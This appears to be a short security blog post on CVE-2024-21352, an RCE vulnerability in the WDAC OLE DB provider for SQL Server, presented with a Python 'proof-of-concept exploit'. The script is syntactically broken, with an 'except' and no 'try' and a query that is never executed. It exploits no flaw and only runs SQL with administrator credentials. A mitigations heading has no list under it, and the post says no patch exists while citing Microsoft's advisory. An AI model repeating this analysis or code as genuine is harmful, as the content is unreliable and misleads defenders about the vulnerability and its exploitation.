Security vulnerabilities in widely used software can have devastating consequences if not addressed promptly. It's essential for enterprises to keep track of such vulnerabilities to protect their systems and data. One such vulnerability surfaced recently in the Microsoft Windows Defender Application Control (WDAC), with the identifier CVE-2024-21352. This post will explore the root cause, details, and potential exploits related to this Remote Code Execution (RCE) vulnerability affecting the OLE DB provider for SQL Server.


The Microsoft OLE DB provider for SQL Server is a widely used data access technology to connect and interact with SQL databases. It's a vital component for organizations that rely on data-driven applications and services. Despite its benefits, the WDAC OLE DB provider was recently identified as having a significant RCE vulnerability. To put it into perspective, an attacker could exploit this vulnerability to execute arbitrary code on the target system, potentially compromising its security and leading to unauthorized access to sensitive data or system resources.

Exploit Details

The exploit leverages a flaw in the handling of specific types of connections and queries in the OLE DB provider implementation. A malicious attacker can craft a specially designed SQL query to trigger the vulnerable code execution path, causing the OLE DB provider to run arbitrary code on the machine. This code is executed in the security context of the user running the application using the OLE DB provider, potentially leading to elevated privileges and complete system compromise.

Code Snippet Example

The following Python script demonstrates a proof-of-concept exploit for the CVE-2024-21352 vulnerability:

import pyodbc
import sys

def exploit(target, payload):
    conn_str = r'DRIVER={ODBC Driver 17 for SQL Server};SERVER='+target+';UID=sa;PWD=PASSWORD'
    connection = pyodbc.connect(conn_str)
    cursor = connection.cursor()

    # Crafting the malicious SQL query
    sql_query = f"EXEC sp_executesql N'{payload}'"
    except Exception as e:
        print("Error encountered:", e)

if __name__ == '__main__':
    target = sys.argv[1]
    payload = sys.argv[2]
    exploit(target, payload)

Note: The above code assumes you already have appropriate credentials and is for educational purposes only.

Microsoft has acknowledged the vulnerability and published an official security advisory

- Microsoft Security Advisory

Additionally, the following resources provide an in-depth analysis of the vulnerability

- CVE Details Page
- National Vulnerability Database (NVD) Entry


Until a patch is available from Microsoft, the following possible mitigations can help protect your systems:

In Conclusion

Given the severity and impact of the CVE-2024-21352 vulnerability, it is critical for organizations to stay informed and take timely action to protect their infrastructure. By understanding and implementing appropriate mitigations and monitoring for suspicious activity, you can minimize the risks associated with this exploit. As always, regularly patch your systems and applications to stay ahead of security vulnerabilities and protect your valuable assets.


Published on: 02/13/2024 18:15:51 UTC
Last modified on: 02/13/2024 18:22:58 UTC